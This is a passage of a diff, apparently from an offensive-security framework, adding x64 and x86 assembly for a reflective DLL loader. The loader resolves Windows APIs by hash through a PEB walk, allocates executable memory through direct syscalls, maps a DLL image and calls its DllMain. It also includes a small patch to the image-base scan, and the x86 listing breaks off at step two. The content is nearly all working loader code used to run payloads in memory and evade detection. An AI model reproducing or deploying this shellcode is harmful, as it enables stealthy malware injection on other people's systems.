+    mov     uiBaseAddress, r13
+    call    .get_export_info           ; sets uiExportDir, uiNameArray, uiNameOrdinals, uiValueC=NumberOfNames
+    mov     usCounter, 2               ; we want 2 functions
+
+.k32_export_loop:
+    ; bounds check: have we exhausted all exports?
+    mov     rax, uiValueC
+    test    rax, rax
+    jz      .check_all_found
+    dec     rax
+    mov     uiValueC, rax
+
+    ; hash the export name
+    mov     rcx, uiNameArray
+    mov     ecx, dword [rcx]           ; RVA of name
+    add     rcx, uiBaseAddress          ; VA of name string
+    call    .hash_funcname              ; returns hash in eax
+    mov     dwHashValue, rax
+
+    cmp     eax, LOADLIBRARYA_HASH
+    je      .k32_store_func
+    cmp     eax, GETPROCADDRESS_HASH
+    je      .k32_store_func
+    jmp     .k32_next_export
+
+.k32_store_func:
+    ; get AddressOfFunctions
+    mov     r14, uiExportDir
+    mov     r14d, dword [r14 + 0x1C]   ; AddressOfFunctions RVA
+    add     r14, uiBaseAddress          ; VA
+    ; index = ordinal from NameOrdinals table
+    mov     r15, uiNameOrdinals
+    movzx   r15d, word [r15]           ; ordinal index
+    lea     r14, [r14 + r15*4]         ; &AddressOfFunctions[ordinal]
+    mov     r14d, dword [r14]          ; function RVA
+    add     r14, uiBaseAddress         ; function VA
+
+    mov     eax, dword [rbp - 144]     ; dwHashValue low 32
+    cmp     eax, LOADLIBRARYA_HASH
+    jne     .k32_try_gpa
+    mov     pLoadLibraryA, r14
+    jmp     .k32_dec_counter
+.k32_try_gpa:
+    mov     pGetProcAddress, r14
+.k32_dec_counter:
+    mov     rax, usCounter
+    dec     rax
+    mov     usCounter, rax
+    ; early out if all kernel32 functions found
+    test    rax, rax
+    jz      .check_all_found
+
+.k32_next_export:
+    add     uiNameArray,    4           ; next DWORD
+    add     uiNameOrdinals, 2           ; next WORD
+    jmp     .k32_export_loop
+
+    ; ------------------------------------------------------------------
+    ; process_ntdll: find NtFlushInstructionCache, ZwAllocateVirtualMemory,
+    ;                      ZwProtectVirtualMemory
+    ; ------------------------------------------------------------------
+.process_ntdll:
+    mov     rax, uiValueA              ; restore module entry pointer
+    mov     r13, [rax + 0x20]          ; DllBase
+    mov     uiBaseAddress, r13
+    call    .get_export_info           ; sets uiExportDir, uiNameArray, uiNameOrdinals, uiValueC=NumberOfNames
+    mov     usCounter, 3               ; we want 3 functions
+
+.ntdll_export_loop:
+    ; bounds check
+    mov     rax, uiValueC
+    test    rax, rax
+    jz      .check_all_found
+    dec     rax
+    mov     uiValueC, rax
+
+    mov     rcx, uiNameArray
+    mov     ecx, dword [rcx]
+    add     rcx, uiBaseAddress
+    call    .hash_funcname
+    mov     dwHashValue, rax
+
+    cmp     eax, NTFLUSHINSTRUCTIONCACHE_HASH
+    je      .ntdll_store_func
+    cmp     eax, ZWALLOCATEVIRTUALMEMORY_HASH
+    je      .ntdll_store_func
+    cmp     eax, ZWPROTECTVIRTUALMEMORY_HASH
+    je      .ntdll_store_func
+    jmp     .ntdll_next
+
+.ntdll_store_func:
+    mov     r14, uiExportDir
+    mov     r14d, dword [r14 + 0x1C]
+    add     r14, uiBaseAddress
+    mov     r15, uiNameOrdinals
+    movzx   r15d, word [r15]
+    lea     r14, [r14 + r15*4]
+    mov     r14d, dword [r14]
+    add     r14, uiBaseAddress
+
+    mov     eax, dword [rbp - 144]     ; dwHashValue low 32
+    cmp     eax, NTFLUSHINSTRUCTIONCACHE_HASH
+    jne     .ntdll_try_zw
+    mov     pNtFlushInstructionCache, r14
+    jmp     .ntdll_dec_counter
+.ntdll_try_zw:
+    cmp     eax, ZWALLOCATEVIRTUALMEMORY_HASH
+    jne     .ntdll_try_zw_prot
+    mov     pZwAllocateVirtualMemory, r14
+    jmp     .ntdll_dec_counter
+.ntdll_try_zw_prot:
+    mov     pZwProtectVirtualMemory, r14
+.ntdll_dec_counter:
+    mov     rax, usCounter
+    dec     rax
+    mov     usCounter, rax
+    test    rax, rax
+    jz      .check_all_found
+
+.ntdll_next:
+    add     uiNameArray,    4
+    add     uiNameOrdinals, 2
+    jmp     .ntdll_export_loop
+
+.check_all_found:
+    mov     rax, pLoadLibraryA
+    test    rax, rax
+    jz      .next_module
+    mov     rax, pGetProcAddress
+    test    rax, rax
+    jz      .next_module
+    mov     rax, pZwAllocateVirtualMemory
+    test    rax, rax
+    jz      .next_module
+    mov     rax, pZwProtectVirtualMemory
+    test    rax, rax
+    jz      .next_module
+    mov     rax, pNtFlushInstructionCache
+    test    rax, rax
+    jnz     .step2
+
+.next_module:
+    mov     rax, uiValueA              ; restore saved module entry pointer
+    mov     rax, [rax]                 ; Flink -> next LIST_ENTRY
+    jmp     .walk_modules
+
+    ; =========================================================================
+    ; STEP 2: ZwAllocateVirtualMemory a new region and copy headers
+    ; =========================================================================
+.step2:
+    ; uiHeaderValue = uiLibraryAddress + e_lfanew
+    mov     rcx, uiLibraryAddress
+    mov     eax, dword [rcx + 0x3C]
+    lea     r12, [rcx + rax]           ; r12 = NT headers VA
+    mov     uiHeaderValue, r12
+
+    ; ZwAllocateVirtualMemory(-1, &BaseAddress, 0, &RegionSize,
+    ;                         MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE)
+    ; SizeOfImage at NT+0x50
+    ; Stack layout: shadow(0x20) + 2 stack params(0x10) + pad(0x08) + 2 locals(0x10)
+    sub     rsp, 0x48
+    xor     rax, rax
+    mov     [rsp + 0x38], rax          ; local BaseAddress = NULL
+    mov     eax, dword [r12 + 0x50]    ; SizeOfImage
+    mov     [rsp + 0x40], rax          ; local RegionSize = SizeOfImage
+    mov     rcx, -1                    ; ProcessHandle = current process
+    lea     rdx, [rsp + 0x38]          ; pBaseAddress
+    xor     r8, r8                     ; ZeroBits = 0
+    lea     r9, [rsp + 0x40]           ; pRegionSize
+    mov     dword [rsp + 0x20], MEM_RESERVE | MEM_COMMIT
+    mov     dword [rsp + 0x28], PAGE_EXECUTE_READWRITE
+    mov     r10, pZwAllocateVirtualMemory
+    call    .direct_syscall
+    mov     rax, [rsp + 0x38]          ; retrieve allocated BaseAddress
+    add     rsp, 0x48
+    mov     uiBaseAddress, rax         ; save new base
+
+    ; copy headers: SizeOfHeaders bytes from uiLibraryAddress to uiBaseAddress
+    ; SizeOfHeaders at OptionalHeader offset 0x3C => NT+0x18+0x3C = NT+0x54
+    mov     ecx, dword [r12 + 0x54]   ; SizeOfHeaders
+    mov     rsi, uiLibraryAddress
+    mov     rdi, uiBaseAddress
+    rep movsb
+
+    ; =========================================================================
+    ; STEP 3: copy sections
+    ; =========================================================================
+    ; IMAGE_FILE_HEADER.SizeOfOptionalHeader at NT+0x14
+    movzx   rax, word [r12 + 0x14]    ; SizeOfOptionalHeader
+    lea     r13, [r12 + 0x18 + rax]   ; pointer to first IMAGE_SECTION_HEADER
+    ; IMAGE_FILE_HEADER.NumberOfSections at NT+0x06
+    movzx   r15d, word [r12 + 0x06]
+
+.copy_sections:
+    test    r15d, r15d
+    jz      .step4
+
+    ; destination: uiBaseAddress + section.VirtualAddress
+    mov     eax, dword [r13 + 0x0C]   ; VirtualAddress
+    mov     rdi, uiBaseAddress
+    add     rdi, rax
+
+    ; source: uiLibraryAddress + section.PointerToRawData
+    mov     eax, dword [r13 + 0x14]   ; PointerToRawData
+    mov     rsi, uiLibraryAddress
+    add     rsi, rax
+
+    ; size: SizeOfRawData
+    mov     ecx, dword [r13 + 0x10]   ; SizeOfRawData
+    rep movsb
+
+    add     r13, 40                    ; sizeof(IMAGE_SECTION_HEADER) = 40
+    dec     r15d
+    jmp     .copy_sections
+
+    ; =========================================================================
+    ; STEP 4: process import table
+    ; =========================================================================
+.step4:
+    ; IMAGE_DIRECTORY_ENTRY_IMPORT (index 1)
+    ; DataDirectory[1] = NT+0x88 + 1*8 = NT+0x90
+    mov     eax, dword [r12 + 0x90]   ; import dir VirtualAddress
+    test    eax, eax
+    jz      .step5
+    mov     r14, uiBaseAddress
+    add     r14, rax                   ; r14 = first IMAGE_IMPORT_DESCRIPTOR
+
+.import_desc_loop:
+    mov     eax, dword [r14 + 0x0C]   ; Name RVA
+    test    eax, eax
+    jz      .step5
+
+    ; LoadLibraryA(name)
+    mov     rcx, uiBaseAddress
+    add     rcx, rax
+    sub     rsp, 0x28
+    call    pLoadLibraryA
+    add     rsp, 0x28
+    mov     r13, rax                   ; r13 = loaded library base
+
+    ; OriginalFirstThunk (prefer over FirstThunk for lookup)
+    mov     eax, dword [r14 + 0x00]
+    test    eax, eax
+    jnz     .have_oft
+    ; fall back to FirstThunk if no OriginalFirstThunk
+    mov     eax, dword [r14 + 0x10]
+.have_oft:
+    mov     rsi, uiBaseAddress
+    add     rsi, rax                   ; rsi = thunk array for lookup (OFT or FT)
+
+    ; FirstThunk (IAT) — this is what we patch
+    mov     eax, dword [r14 + 0x10]
+    mov     rdi, uiBaseAddress
+    add     rdi, rax                   ; rdi = IAT entry (QWORD)
+
+.iat_loop:
+    ; read thunk value from OFT/FT for lookup
+    mov     rax, [rsi]
+    test    rax, rax
+    jz      .next_import_desc
+
+    ; check IMAGE_ORDINAL_FLAG64
+    mov     rcx, IMAGE_ORDINAL_FLAG64
+    test    rax, rcx
+    jnz     .import_by_ordinal
+
+    ; import by name: rax = RVA of IMAGE_IMPORT_BY_NAME
+    mov     rcx, uiBaseAddress
+    add     rcx, rax                   ; rcx -> IMAGE_IMPORT_BY_NAME
+    add     rcx, 2                     ; skip Hint (WORD), point to Name
+    ; GetProcAddress(r13, name)
+    sub     rsp, 0x28
+    mov     rdx, rcx
+    mov     rcx, r13
+    call    pGetProcAddress
+    add     rsp, 0x28
+    mov     [rdi], rax                 ; patch IAT
+    jmp     .next_iat
+
+.import_by_ordinal:
+    ; GetProcAddress(hModule, MAKEINTRESOURCE(ordinal))
+    ; MAKEINTRESOURCE = ordinal value as pointer (low 16 bits)
+    movzx   rdx, word [rsi]           ; ordinal = low 16 bits of thunk
+    sub     rsp, 0x28
+    mov     rcx, r13
+    call    pGetProcAddress
+    add     rsp, 0x28
+    mov     [rdi], rax                 ; patch IAT
+
+.next_iat:
+    add     rsi, 8                     ; next lookup thunk (QWORD)
+    add     rdi, 8                     ; next IAT entry (QWORD)
+    jmp     .iat_loop
+
+.next_import_desc:
+    add     r14, 20                    ; sizeof(IMAGE_IMPORT_DESCRIPTOR) = 20
+    jmp     .import_desc_loop
+
+    ; =========================================================================
+    ; STEP 5: apply base relocations
+    ; =========================================================================
+.step5:
+    ; delta = new_base - original ImageBase
+    ; OptionalHeader.ImageBase at OptHdr+0x18 => NT+0x18+0x18 = NT+0x30
+    mov     rax, uiBaseAddress
+    mov     rcx, [r12 + 0x30]         ; OptionalHeader.ImageBase
+    sub     rax, rcx
+    mov     uiLibraryAddress, rax      ; reuse slot as delta
+
+    ; reloc dir: DataDirectory[5] = NT+0x88 + 5*8 = NT+0xB0
+    mov     eax, dword [r12 + 0xB0]   ; reloc dir VirtualAddress
+    test    eax, eax
+    jz      .step6
+    mov     ecx, dword [r12 + 0xB4]   ; reloc dir Size
+    test    ecx, ecx
+    jz      .step6
+
+    mov     r14, uiBaseAddress
+    add     r14, rax                   ; r14 = first IMAGE_BASE_RELOCATION block
+
+.reloc_block_loop:
+    mov     eax, dword [r14 + 4]       ; SizeOfBlock
+    test    eax, eax
+    jz      .step6
+
+    ; number of reloc entries = (SizeOfBlock - 8) / 2
+    sub     eax, 8
+    shr     eax, 1
+    mov     r15d, eax
+
+    ; block page base VA (must use 64-bit add to preserve high bits)
+    mov     eax, dword [r14 + 0]       ; block VirtualAddress (DWORD)
+    mov     r13, uiBaseAddress
+    add     r13, rax                   ; 64-bit add: r13 = base + VirtualAddress
+
+    lea     r12, [r14 + 8]            ; first WORD entry
+
+.reloc_entry_loop:
+    test    r15d, r15d
+    jz      .reloc_next_block
+
+    movzx   eax, word [r12]
+    mov     ebx, eax
+    shr     ebx, 12                    ; type = high 4 bits
+    and     eax, 0x0FFF               ; offset = low 12 bits
+
+    cmp     ebx, IMAGE_REL_BASED_DIR64
+    je      .reloc_dir64
+    cmp     ebx, IMAGE_REL_BASED_HIGHLOW
+    je      .reloc_highlow
+    jmp     .reloc_next_entry          ; skip ABSOLUTE and others
+
+.reloc_dir64:
+    mov     rdx, uiLibraryAddress      ; delta
+    add     qword [r13 + rax], rdx
+    jmp     .reloc_next_entry
+
+.reloc_highlow:
+    mov     edx, dword [rbp - 40]      ; delta low 32 bits
+    add     dword [r13 + rax], edx
+    jmp     .reloc_next_entry
+
+.reloc_next_entry:
+    add     r12, 2
+    dec     r15d
+    jmp     .reloc_entry_loop
+
+.reloc_next_block:
+    mov     eax, dword [r14 + 4]       ; SizeOfBlock
+    add     r14, rax
+    jmp     .reloc_block_loop
+
+    ; =========================================================================
+    ; STEP 6: set correct memory protections per section
+    ; =========================================================================
+.step6:
+    ; re-derive NT header (r12 may have been clobbered in reloc loop)
+    mov     rcx, uiBaseAddress
+    mov     eax, dword [rcx + 0x3C]
+    lea     r12, [rcx + rax]
+
+    ; walk section headers
+    movzx   rax, word [r12 + 0x14]    ; SizeOfOptionalHeader
+    lea     r13, [r12 + 0x18 + rax]   ; first IMAGE_SECTION_HEADER
+    movzx   r15d, word [r12 + 0x06]   ; NumberOfSections
+
+.protect_section_loop:
+    test    r15d, r15d
+    jz      .step7
+
+    ; skip if VirtualSize is 0
+    mov     eax, dword [r13 + 0x08]   ; VirtualSize
+    test    eax, eax
+    jz      .protect_next_section
+
+    ; derive protection from Characteristics (offset 0x24)
+    ; bits: 29=EXECUTE, 30=READ, 31=WRITE -> shift to bits 0,1,2
+    mov     eax, dword [r13 + 0x24]   ; Characteristics
+    shr     eax, 29
+    and     eax, 0x7                   ; 3-bit index: XRW
+
+    ; inline lookup: 3-bit index -> Windows memory protection constant
+    jmp     .prot_table
+.got_prot_table:
+    pop     rbx
+    movzx   ebx, byte [rbx + rax]     ; ebx = NewProtect
+
+    ; ZwProtectVirtualMemory(-1, &BaseAddr, &RegionSize, NewProtect, &OldProtect)
+    sub     rsp, 0x48
+    ; local BaseAddress = uiBaseAddress + section.VirtualAddress
+    mov     eax, dword [r13 + 0x0C]   ; section VirtualAddress RVA
+    mov     rcx, uiBaseAddress
+    add     rcx, rax
+    mov     [rsp + 0x30], rcx          ; local BaseAddress
+    ; local RegionSize = section.VirtualSize
+    mov     eax, dword [r13 + 0x08]   ; VirtualSize
+    mov     [rsp + 0x38], rax          ; local RegionSize
+    ; local OldProtect
+    mov     dword [rsp + 0x40], 0      ; OldProtect = 0
+    mov     rcx, -1                    ; ProcessHandle = NtCurrentProcess
+    lea     rdx, [rsp + 0x30]          ; &BaseAddress
+    lea     r8, [rsp + 0x38]           ; &RegionSize
+    mov     r9d, ebx                   ; NewProtect
+    lea     rax, [rsp + 0x40]
+    mov     [rsp + 0x20], rax          ; 5th param: &OldProtect
+    mov     r10, pZwProtectVirtualMemory
+    call    .direct_syscall
+    add     rsp, 0x48
+
+.protect_next_section:
+    add     r13, 40                    ; next section header
+    dec     r15d
+    jmp     .protect_section_loop
+
+    ; =========================================================================
+    ; STEP 7: call DllMain(hinstDLL, DLL_PROCESS_ATTACH, NULL)
+    ; =========================================================================
+.step7:
+    ; re-derive NT header (r12 may have been clobbered in protect loop)
+    mov     rcx, uiBaseAddress
+    mov     eax, dword [rcx + 0x3C]
+    lea     r12, [rcx + rax]
+
+    ; AddressOfEntryPoint at OptHdr+0x10 => NT+0x18+0x10 = NT+0x28
+    mov     eax, dword [r12 + 0x28]
+    mov     r13, uiBaseAddress
+    add     r13, rax                   ; r13 = DllMain VA
+
+    ; NtFlushInstructionCache(-1, NULL, 0)
+    sub     rsp, 0x28
+    mov     rcx, -1
+    xor     rdx, rdx
+    xor     r8d, r8d
+    call    pNtFlushInstructionCache
+    add     rsp, 0x28
+
+    ; call DllMain(hInstance, DLL_PROCESS_ATTACH, NULL)
+    sub     rsp, 0x28
+    mov     rcx, uiBaseAddress
+    mov     edx, DLL_PROCESS_ATTACH
+    xor     r8d, r8d
+    call    r13
+    add     rsp, 0x28
+
+    ; return DllMain VA in rax
+    mov     rax, r13
+
+    ; ---- epilogue -----------------------------------------------------------
+    pop     r15
+    pop     r14
+    pop     r13
+    pop     r12
+    pop     rdi
+    pop     rsi
+    pop     rbx
+    mov     rsp, rbp
+    pop     rbp
+    ret
+
+.direct_syscall:
+    ; ========================================================================
+    ; HELPER: .direct_syscall
+    ; IN: r10 = Zw function address
+    ; ========================================================================
+    mov eax, dword [r10 + 0x4]
+    lea r11, [r10 + 8]
+    mov r10, rcx
+    jmp r11
+    
+    ; =========================================================================
+    ; HELPER: .get_export_info
+    ; IN:  r13 = module DllBase, uiBaseAddress = same
+    ; OUT: uiExportDir, uiNameArray, uiNameOrdinals, uiValueC=NumberOfNames
+    ; CLOBBERS: rax, rbx, rcx
+    ; =========================================================================
+.get_export_info:
+    ; NT headers
+    mov     eax, dword [r13 + 0x3C]
+    lea     rbx, [r13 + rax]           ; rbx = NT headers
+    ; export dir: DataDirectory[0] at NT+0x88
+    mov     eax, dword [rbx + 0x88]    ; export dir RVA
+    lea     rcx, [r13 + rax]           ; export dir VA
+    mov     uiExportDir, rcx
+    ; NumberOfNames
+    mov     eax, dword [rcx + 0x18]
+    mov     uiValueC, rax              ; save as export count bound
+    ; AddressOfNames
+    mov     eax, dword [rcx + 0x20]
+    lea     rax, [r13 + rax]
+    mov     uiNameArray, rax
+    ; AddressOfNameOrdinals
+    mov     eax, dword [rcx + 0x24]
+    lea     rax, [r13 + rax]
+    mov     uiNameOrdinals, rax
+    ret
+
+    ; =========================================================================
+    ; HELPER: .hash_funcname
+    ; IN:  rcx = pointer to null-terminated ASCII function name
+    ; OUT: eax = ROR13 hash
+    ; CLOBBERS: rbx, rcx
+    ; =========================================================================
+.hash_funcname:
+    mov     eax, 0
+.hfn_loop:
+    movzx   ebx, byte [rcx]
+    test    ebx, ebx
+    jz      .hfn_done
+    ror     eax, 13
+    add     eax, ebx
+    inc     rcx
+    jmp     .hfn_loop
+.hfn_done:
+    ret
+.prot_table:
+    call .got_prot_table
+    ;       ---   X     R     XR    W     XW    RW    XRW
+    db      0x01, 0x10, 0x02, 0x20, 0x04, 0x40, 0x04, 0x40

--- a/external/source/shellcode/windows/x64/src/reflective_loader.asm
+++ b/external/source/shellcode/windows/x64/src/reflective_loader.asm
@@ -134,7 +134,7 @@ ReflectiveLoader:
     cmp     eax, IMAGE_NT_SIGNATURE     ; 'PE\0\0'
     je      .found_base
 .next_page:
-    sub     rcx, 0x1000
+    sub     rcx, 0x1
     jmp     .scan_page
 
 .found_base:

--- a/external/source/shellcode/windows/x86/src/reflective_loader.asm
+++ b/external/source/shellcode/windows/x86/src/reflective_loader.asm
@@ -1,0 +1,708 @@
+; =============================================================================
+; ReflectiveLoader x86 - Position Independent Shellcode
+; Port of: https://github.com/stephenfewer/ReflectiveDLLInjection
+; Original author: Stephen Fewer / Harmony Security
+; Author of this port: jbx81 (github.com/jbx81-1337)
+; NASM syntax, Win32 stdcall ABI, no relocations
+; Assemble: nasm -f bin reflective_loader_x86.asm -o reflective_loader_x86.bin
+; =============================================================================
+
+BITS 32
+
+; ---------------------------------------------------------------------------
+; Hash constants (same ROR13 algorithm as x64 — identical values)
+; ---------------------------------------------------------------------------
+KERNEL32DLL_HASH            EQU 0x6A4ABC5B
+NTDLLDLL_HASH               EQU 0x3CFA685D
+LOADLIBRARYA_HASH           EQU 0xEC0E4E8E
+GETPROCADDRESS_HASH         EQU 0x7C0DFCAA
+ZWALLOCATEVIRTUALMEMORY_HASH EQU 0xD33D4AED
+ZWPROTECTVIRTUALMEMORY_HASH EQU 0xBC3F4D89
+NTFLUSHINSTRUCTIONCACHE_HASH EQU 0x534C0AB8
+
+; PE / reloc constants
+IMAGE_DOS_SIGNATURE         EQU 0x5A4D
+IMAGE_NT_SIGNATURE          EQU 0x00004550
+IMAGE_ORDINAL_FLAG32        EQU 0x80000000
+IMAGE_REL_BASED_ABSOLUTE    EQU 0
+IMAGE_REL_BASED_HIGHLOW     EQU 3
+
+MEM_RESERVE                 EQU 0x2000
+MEM_COMMIT                  EQU 0x1000
+PAGE_EXECUTE_READWRITE      EQU 0x40
+DLL_PROCESS_ATTACH          EQU 1
+
+; ---------------------------------------------------------------------------
+; Stack frame layout (ebp-based, 4-byte slots)
+;   [ebp - 4 ]  = pLoadLibraryA
+;   [ebp - 8 ]  = pGetProcAddress
+;   [ebp - 12]  = pZwAllocateVirtualMemory
+;   [ebp - 16]  = pNtFlushInstructionCache
+;   [ebp - 20]  = uiLibraryAddress  (source image base / later delta)
+;   [ebp - 24]  = uiBaseAddress     (new alloc / module base during walk)
+;   [ebp - 28]  = uiHeaderValue     (NT header VA)
+;   [ebp - 32]  = uiExportDir
+;   [ebp - 36]  = uiNameArray
+;   [ebp - 40]  = uiNameOrdinals
+;   [ebp - 44]  = uiAddressArray
+;   [ebp - 48]  = uiValueA          (saved module list entry pointer)
+;   [ebp - 52]  = uiValueB          (section count / reloc entry count)
+;   [ebp - 56]  = uiValueC          (NumberOfNames)
+;   [ebp - 60]  = uiValueD          (import desc ptr / reloc block ptr / DllMain VA)
+;   [ebp - 64]  = uiValueE          (loaded library base / reloc page base)
+;   [ebp - 68]  = usCounter
+;   [ebp - 72]  = dwHashValue
+;   [ebp - 76]  = pZwProtectVirtualMemory
+; ---------------------------------------------------------------------------
+%define pLoadLibraryA           dword [ebp -  4]
+%define pGetProcAddress         dword [ebp -  8]
+%define pZwAllocateVirtualMemory dword [ebp - 12]
+%define pNtFlushInstructionCache dword [ebp - 16]
+%define uiLibraryAddress        dword [ebp - 20]
+%define uiBaseAddress           dword [ebp - 24]
+%define uiHeaderValue           dword [ebp - 28]
+%define uiExportDir             dword [ebp - 32]
+%define uiNameArray             dword [ebp - 36]
+%define uiNameOrdinals          dword [ebp - 40]
+%define uiAddressArray          dword [ebp - 44]
+%define uiValueA                dword [ebp - 48]
+%define uiValueB                dword [ebp - 52]
+%define uiValueC                dword [ebp - 56]
+%define uiValueD                dword [ebp - 60]
+%define uiValueE                dword [ebp - 64]
+%define usCounter               dword [ebp - 68]
+%define dwHashValue             dword [ebp - 72]
+%define pZwProtectVirtualMemory  dword [ebp - 76]
+
+; ============================================================================
+; Entry: ReflectiveLoader()
+;   Returns in EAX: VA of DllMain in newly mapped image
+; ============================================================================
+global ReflectiveLoader
+ReflectiveLoader:
+    ; ---- prologue -----------------------------------------------------------
+    push    ebp
+    mov     ebp, esp
+    sub     esp, 80                    ; 76 bytes locals + 4 alignment
+    push    ebx
+    push    esi
+    push    edi
+
+    ; zero the function pointer slots
+    xor     eax, eax
+    mov     pLoadLibraryA, eax
+    mov     pGetProcAddress, eax
+    mov     pZwAllocateVirtualMemory, eax
+    mov     pNtFlushInstructionCache, eax
+    mov     pZwProtectVirtualMemory, eax
+
+    ; disable base address parameter — compatible with standard reflective loader
+    xor     ecx, ecx
+    test    ecx, ecx
+    jnz     .found_base
+
+    ; =========================================================================
+    ; STEP 0: find our own image base by scanning backwards from EIP
+    ; =========================================================================
+    call    .get_eip
+.get_eip:
+    pop     ecx                         ; ecx = address of this pop instruction
+
+    ; page-align downward and scan for MZ + valid PE signature
+    and     ecx, 0xFFFFF000
+.scan_page:
+    cmp     word [ecx], IMAGE_DOS_SIGNATURE
+    jne     .next_page
+    ; check e_lfanew range [0x40 .. 0x400)
+    mov     eax, dword [ecx + 0x3C]
+    cmp     eax, 0x40
+    jb      .next_page
+    cmp     eax, 0x400
+    jae     .next_page
+    ; check NT signature
+    cmp     dword [ecx + eax], IMAGE_NT_SIGNATURE
+    je      .found_base
+.next_page:
+    sub     ecx, 0x1000
+    jmp     .scan_page
+
+.found_base:
+    ; ecx = our DLL image base
+    mov     uiLibraryAddress, ecx
+
+    ; =========================================================================
+    ; STEP 1: walk PEB -> LDR -> InMemoryOrderModuleList
+    ;         find kernel32 and ntdll, resolve 5 function pointers by hash
+    ; =========================================================================
+    ; x86: PEB at FS:[0x30]
+    mov     eax, dword fs:[0x30]        ; eax = PEB
+    mov     eax, [eax + 0x0C]          ; eax = PEB.Ldr (PEB_LDR_DATA*)
+    mov     eax, [eax + 0x14]          ; eax = InMemoryOrderModuleList.Flink
+
+.walk_modules:
+    test    eax, eax
+    jz      .step2
+
+    ; Save module list entry pointer
+    mov     uiValueA, eax
+
+    ; 32-bit LDR_DATA_TABLE_ENTRY (from InMemoryOrderLinks):
+    ;   +0x10 DllBase
+    ;   +0x24 BaseDllName.Length
+    ;   +0x28 BaseDllName.Buffer
+
+    movzx   ecx, word [eax + 0x24]    ; BaseDllName.Length (bytes)
+    test    ecx, ecx
+    jz      .next_module
+    mov     edx, [eax + 0x28]         ; BaseDllName.Buffer (PWSTR)
+
+    ; hash the module name (byte-by-byte over UTF-16LE, uppercase normalize)
+    mov     edi, 0                   ; edi = hash accumulator
+.hash_modname:
+    ror     edi, 13
+    movzx   ebx, byte [edx]
+    cmp     bl, 'a'
+    jb      .hash_no_upper
+    sub     bl, 0x20                   ; to uppercase
+.hash_no_upper:
+    add     edi, ebx
+    inc     edx
+    dec     ecx
+    jnz     .hash_modname
+
+    ; check hashes
+    cmp     edi, KERNEL32DLL_HASH
+    je      .process_kernel32
+    cmp     edi, NTDLLDLL_HASH
+    je      .process_ntdll
+    jmp     .next_module
+
+    ; ------------------------------------------------------------------
+    ; process_kernel32: find LoadLibraryA, GetProcAddress
+    ; ------------------------------------------------------------------
+.process_kernel32:
+    mov     eax, uiValueA
+    mov     esi, [eax + 0x10]         ; DllBase
+    mov     uiBaseAddress, esi
+    call    .get_export_info           ; sets uiExportDir, uiNameArray, uiNameOrdinals, uiValueC
+    mov     usCounter, 2               ; we want 2 functions
+
+.k32_export_loop:
+    ; bounds check
+    mov     eax, uiValueC
+    test    eax, eax
+    jz      .check_all_found
+    dec     eax
+    mov     uiValueC, eax
+
+    ; hash the export name
+    mov     ecx, uiNameArray
+    mov     ecx, [ecx]                ; RVA of name
+    add     ecx, uiBaseAddress         ; VA of name string
+    call    .hash_funcname             ; returns hash in eax
+    mov     dwHashValue, eax
+
+    cmp     eax, LOADLIBRARYA_HASH
+    je      .k32_store_func
+    cmp     eax, GETPROCADDRESS_HASH
+    je      .k32_store_func
+    jmp     .k32_next_export
+
+.k32_store_func:
+    ; resolve function address via ordinal table
+    mov     edx, uiExportDir
+    mov     edx, [edx + 0x1C]         ; AddressOfFunctions RVA
+    add     edx, uiBaseAddress         ; VA
+    mov     ecx, uiNameOrdinals
+    movzx   ecx, word [ecx]           ; ordinal index
+    mov     edx, [edx + ecx*4]        ; function RVA
+    add     edx, uiBaseAddress         ; function VA
+
+    mov     eax, dwHashValue
+    cmp     eax, LOADLIBRARYA_HASH
+    jne     .k32_try_gpa
+    mov     pLoadLibraryA, edx
+    jmp     .k32_dec_counter
+.k32_try_gpa:
+    mov     pGetProcAddress, edx
+.k32_dec_counter:
+    mov     eax, usCounter
+    dec     eax
+    mov     usCounter, eax
+    test    eax, eax
+    jz      .check_all_found
+
+.k32_next_export:
+    add     uiNameArray, 4
+    add     uiNameOrdinals, 2
+    jmp     .k32_export_loop
+
+    ; ------------------------------------------------------------------
+    ; process_ntdll: find NtFlushInstructionCache, ZwAllocateVirtualMemory,
+    ;                      ZwProtectVirtualMemory
+    ; ------------------------------------------------------------------
+.process_ntdll:
+    mov     eax, uiValueA
+    mov     esi, [eax + 0x10]         ; DllBase
+    mov     uiBaseAddress, esi
+    call    .get_export_info
+    mov     usCounter, 3               ; we want 3 functions
+
+.ntdll_export_loop:
+    ; bounds check
+    mov     eax, uiValueC
+    test    eax, eax
+    jz      .check_all_found
+    dec     eax
+    mov     uiValueC, eax
+
+    mov     ecx, uiNameArray
+    mov     ecx, [ecx]
+    add     ecx, uiBaseAddress
+    call    .hash_funcname
+    mov     dwHashValue, eax
+
+    cmp     eax, NTFLUSHINSTRUCTIONCACHE_HASH
+    je      .ntdll_store_func
+    cmp     eax, ZWALLOCATEVIRTUALMEMORY_HASH
+    je      .ntdll_store_func
+    cmp     eax, ZWPROTECTVIRTUALMEMORY_HASH
+    je      .ntdll_store_func
+    jmp     .ntdll_next
+
+.ntdll_store_func:
+    mov     edx, uiExportDir
+    mov     edx, [edx + 0x1C]
+    add     edx, uiBaseAddress
+    mov     ecx, uiNameOrdinals
+    movzx   ecx, word [ecx]
+    mov     edx, [edx + ecx*4]
+    add     edx, uiBaseAddress
+
+    mov     eax, dwHashValue
+    cmp     eax, NTFLUSHINSTRUCTIONCACHE_HASH
+    jne     .ntdll_try_zw
+    mov     pNtFlushInstructionCache, edx
+    jmp     .ntdll_dec_counter
+.ntdll_try_zw:
+    cmp     eax, ZWALLOCATEVIRTUALMEMORY_HASH
+    jne     .ntdll_try_zw_prot
+    mov     pZwAllocateVirtualMemory, edx
+    jmp     .ntdll_dec_counter
+.ntdll_try_zw_prot:
+    mov     pZwProtectVirtualMemory, edx
+.ntdll_dec_counter:
+    mov     eax, usCounter
+    dec     eax
+    mov     usCounter, eax
+    test    eax, eax
+    jz      .check_all_found
+
+.ntdll_next:
+    add     uiNameArray, 4
+    add     uiNameOrdinals, 2
+    jmp     .ntdll_export_loop
+
+.check_all_found:
+    cmp     pLoadLibraryA, 0
+    jz      .next_module
+    cmp     pGetProcAddress, 0
+    jz      .next_module
+    cmp     pZwAllocateVirtualMemory, 0
+    jz      .next_module
+    cmp     pZwProtectVirtualMemory, 0
+    jz      .next_module
+    cmp     pNtFlushInstructionCache, 0
+    jnz     .step2
+
+.next_module:
+    mov     eax, uiValueA
+    mov     eax, [eax]                ; Flink -> next LIST_ENTRY
+    jmp     .walk_modules
+
+    ; =========================================================================
+    ; STEP 2: ZwAllocateVirtualMemory a new region and copy headers
+    ; =========================================================================
+.step2:
